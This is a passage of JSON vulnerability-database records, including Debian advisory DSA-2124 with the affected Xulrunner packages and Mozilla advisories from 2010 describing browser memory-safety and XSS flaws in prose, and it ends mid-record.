{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_mipsel.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "xulrunner-1.9_1.9.0.19-6_amd64.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "spidermonkey-bin_1.9.0.19-6_powerpc.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "libmozjs1d_1.9.0.19-6_sparc.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "python-xpcom_1.9.0.19-6_mips.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "src", "packageFilename": "xulrunner_1.9.0.19-6.dsc", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "libmozjs-dev_1.9.0.19-6_i386.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_sparc.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_amd64.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "xulrunner-1.9_1.9.0.19-6_powerpc.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "libmozjs-dev_1.9.0.19-6_ia64.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "libmozjs1d_1.9.0.19-6_amd64.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "python-xpcom_1.9.0.19-6_i386.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_arm.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_alpha.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "spidermonkey-bin_1.9.0.19-6_i386.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "libmozjs-dev_1.9.0.19-6_mipsel.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "python-xpcom_1.9.0.19-6_mipsel.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "libmozjs1d_1.9.0.19-6_mips.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_alpha.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "libmozjs1d_1.9.0.19-6_i386.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_mips.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_arm.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "python-xpcom_1.9.0.19-6_alpha.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "spidermonkey-bin_1.9.0.19-6_alpha.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "xulrunner-1.9_1.9.0.19-6_i386.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_sparc.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "xulrunner-1.9_1.9.0.19-6_s390.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "spidermonkey-bin_1.9.0.19-6_arm.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_alpha.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "xulrunner-dev_1.9.0.19-6_powerpc.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "spidermonkey-bin_1.9.0.19-6_sparc.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "xulrunner-dev_1.9.0.19-6_s390.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "python-xpcom_1.9.0.19-6_sparc.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "libmozjs-dev_1.9.0.19-6_mips.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_amd64.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "xulrunner-dev_1.9.0.19-6_arm.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "libmozjs-dev_1.9.0.19-6_alpha.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "libmozjs-dev_1.9.0.19-6_s390.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_powerpc.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "xulrunner-dev_1.9.0.19-6_sparc.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "libmozjs1d_1.9.0.19-6_s390.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "libmozjs-dev_1.9.0.19-6_sparc.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "xulrunner-dev_1.9.0.19-6_alpha.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "python-xpcom_1.9.0.19-6_powerpc.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19.orig", "arch": "src", "packageFilename": "xulrunner_1.9.0.19.orig.tar.gz", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "xulrunner-dev_1.9.0.19-6_ia64.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "libmozjs1d_1.9.0.19-6_powerpc.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_ia64.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "spidermonkey-bin_1.9.0.19-6_amd64.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "xulrunner-dev_1.9.0.19-6_mipsel.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "spidermonkey-bin_1.9.0.19-6_mipsel.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_s390.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_ia64.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "python-xpcom_1.9.0.19-6_s390.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "libmozjs-dev_1.9.0.19-6_powerpc.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "libmozjs-dev_1.9.0.19-6_armel.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "libmozjs1d_1.9.0.19-6_armel.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_sparc.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_amd64.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "libmozjs1d_1.9.0.19-6_alpha.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "xulrunner-dev_1.9.0.19-6_armel.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_mips.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_arm.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "libmozjs-dev_1.9.0.19-6_arm.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "xulrunner-dev_1.9.0.19-6_mips.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_s390.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "xulrunner-1.9_1.9.0.19-6_ia64.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_ia64.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "spidermonkey-bin_1.9.0.19-6_armel.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_mips.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "spidermonkey-bin_1.9.0.19-6_s390.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_armel.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "libmozjs-dev_1.9.0.19-6_amd64.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "alpha", "packageFilename": "xulrunner-1.9_1.9.0.19-6_alpha.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "sparc", "packageFilename": "xulrunner-1.9_1.9.0.19-6_sparc.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "python-xpcom_1.9.0.19-6_armel.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_i386.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "xulrunner-1.9_1.9.0.19-6_mips.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_i386.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_mipsel.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6.diff", "arch": "src", "packageFilename": "xulrunner_1.9.0.19-6.diff.gz", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "s390x", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_s390.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "xulrunner-dev_1.9.0.19-6_amd64.deb", "packageName": "xulrunner-dev", "operator": "lt"}], "description": "Several vulnerabilities have been discovered in Xulrunner, the component that provides the core functionality of Iceweasel, Debian's variant of Mozilla's browser technology.\n\nThe Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2010-3765](<https://security-tracker.debian.org/tracker/CVE-2010-3765>)\n\nXulrunner allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption.\n\n * [CVE-2010-3174](<https://security-tracker.debian.org/tracker/CVE-2010-3174>) [CVE-2010-3176](<https://security-tracker.debian.org/tracker/CVE-2010-3176>)\n\nMultiple unspecified vulnerabilities in the browser engine in Xulrunner allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.\n\n * [CVE-2010-3177](<https://security-tracker.debian.org/tracker/CVE-2010-3177>)\n\nMultiple cross-site scripting (XSS) vulnerabilities in the Gopher parser in Xulrunner allow remote attackers to inject arbitrary web script or HTML via a crafted name of a (1) file or (2) directory on a Gopher server.\n\n * [CVE-2010-3178](<https://security-tracker.debian.org/tracker/CVE-2010-3178>)\n\nXulrunner does not properly handle certain modal calls made by javascript: URLs in circumstances related to opening a new window and performing cross-domain navigation, which allows remote attackers to bypass the Same Origin Policy via a crafted HTML document.\n\n * [CVE-2010-3179](<https://security-tracker.debian.org/tracker/CVE-2010-3179>)\n\nStack-based buffer overflow in the text-rendering functionality in Xulrunner allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a long argument to the document.write method.\n\n * [CVE-2010-3180](<https://security-tracker.debian.org/tracker/CVE-2010-3180>)\n\nUse-after-free vulnerability in the nsBarProp function in Xulrunner allows remote attackers to execute arbitrary code by accessing the locationbar property of a closed window.\n\n * [CVE-2010-3183](<https://security-tracker.debian.org/tracker/CVE-2010-3183>)\n\nThe LookupGetterOrSetter function in Xulrunner does not properly support window.__lookupGetter__ function calls that lack arguments, which allows remote attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference and application crash) via a crafted HTML document.\n\nIn addition, this security update includes corrections for regressions caused by the fixes for [CVE-2010-0654](<https://security-tracker.debian.org/tracker/CVE-2010-0654>) and [CVE-2010-2769](<https://security-tracker.debian.org/tracker/CVE-2010-2769>) in DSA-2075-1 and DSA-2106-1.\n\nFor the stable distribution (lenny), these problems have been fixed in version 1.9.0.19-6.\n\nFor the unstable distribution (sid) and the upcoming stable distribution (squeeze), these problems have been fixed in version 3.5.15-1 of the iceweasel package.\n\nWe recommend that you upgrade your Xulrunner packages.", "edition": 1, "reporter": "Debian", "published": "2010-11-01T00:00:00", "title": "xulrunner -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3183"], "modified": "2010-11-01T00:00:00", "id": "DSA-2124", "href": "http://www.debian.org/security/dsa-2124", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:38", "references": ["https://vulners.com/securityvulns/securityvulns:doc:24957", "https://vulners.com/securityvulns/securityvulns:doc:24962", "https://vulners.com/securityvulns/securityvulns:doc:24963", "https://vulners.com/securityvulns/securityvulns:doc:24956", "https://vulners.com/securityvulns/securityvulns:doc:24961", "https://vulners.com/securityvulns/securityvulns:doc:24955", "https://vulners.com/securityvulns/securityvulns:doc:24959", "https://vulners.com/securityvulns/securityvulns:doc:24958", "https://vulners.com/securityvulns/securityvulns:doc:24960"], "description": "Multiple memory corruptions, buffer overflows, crossite scripting, TLS/SSL vulnerabilities, code execution.", "edition": 1, "reporter": "MOZILLA", "published": "2010-10-23T00:00:00", "title": "Mozilla Firefox / Thunderbird / Seamonkey / NSS multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:38", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Firefox", "version": "3.6", "operator": "eq"}, {"name": "SeaMonkey", "version": "2.0", "operator": "eq"}, {"name": "Thunderbird", "version": "3.0", "operator": "eq"}, {"name": "Thunderbird", "version": "3.1", "operator": "eq"}, {"name": "Firefox", "version": "3.5", "operator": "eq"}], "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3181", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-23T00:00:00", "id": "SECURITYVULNS:VULN:11206", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11206", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "Mozilla Foundation Security Advisory 2010-64\r\n\r\nTitle: Miscellaneous memory safety hazards (rv:1.9.2.11/ 1.9.1.14)\r\nImpact: Critical\r\nAnnounced: October 19, 2010\r\nReporter: Mozilla developers and community\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.11\r\n Firefox 3.5.14\r\n Thunderbird 3.1.5\r\n Thunderbird 3.0.9\r\n SeaMonkey 2.0.9\r\nDescription\r\n\r\nMozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\r\nReferences\r\n\r\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\r\n\r\n * Memory safety bugs - Firefox 3.6, Firefox 3.5\r\n * CVE-2010-3176\r\n\r\nGary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski reported memory safety problems that affected Firefox 3.6 only.\r\n\r\n * Memory safety bugs - Firefox 3.6\r\n * CVE-2010-3175\r\n\r\nJesse Ruderman reported a crash which affected Firefox 3.5 only.\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=476547\r\n * CVE-2010-3174\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-10-23T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-64", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3175"], "modified": "2010-10-23T00:00:00", "id": "SECURITYVULNS:DOC:24955", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24955", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "Mozilla Foundation Security Advisory 2010-73\r\n\r\nTitle: Heap buffer overflow mixing document.write and DOM insertion\r\nImpact: Critical\r\nAnnounced: October 27, 2010\r\nReporter: Morten Kråkvik\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.12\r\n Firefox 3.5.15\r\n Thunderbird 3.1.6\r\n Thunderbird 3.0.10\r\n SeaMonkey 2.0.10\r\nDescription\r\n\r\nMorten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms.\r\n\r\nReading mail in Thunderbird does not pose a risk to users, however the vulnerability is present and could be triggered in RSS feeds if JavaScript is enabled or by an add-on that enables browser-like functionality.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=607222\r\n * CVE-2010-3765\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-11-01T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-73", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3765"], "modified": "2010-11-01T00:00:00", "id": "SECURITYVULNS:DOC:25019", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:18", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-72.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.5.14", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.11,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "seamonkey", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.9.2.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxul", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.6.11,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.0.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": 